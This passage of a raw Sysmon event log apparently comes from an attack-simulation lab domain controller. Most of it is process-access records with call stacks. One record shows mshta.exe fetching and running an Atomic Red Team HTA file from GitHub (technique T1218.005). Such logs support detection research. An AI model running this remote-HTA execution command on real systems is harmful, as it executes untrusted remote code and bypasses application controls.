ystem32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.878{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.862{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.862{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.862{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.862{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.862{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.862{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.862{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000028976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.864{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\system32\mshta.exe" "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000028975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.847{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.847{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.847{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000028972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:21.738{7901BC46-53D1-6008-9E06-00000000A301}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\gbnoslx1\gbnoslx1.dll2021-01-20 16:01:21.644 10341000x800000000000000028971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.722{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53D1-6008-9F06-00000000A301}5864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.722{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.722{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.722{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.722{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53D1-6008-9F06-00000000A301}5864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 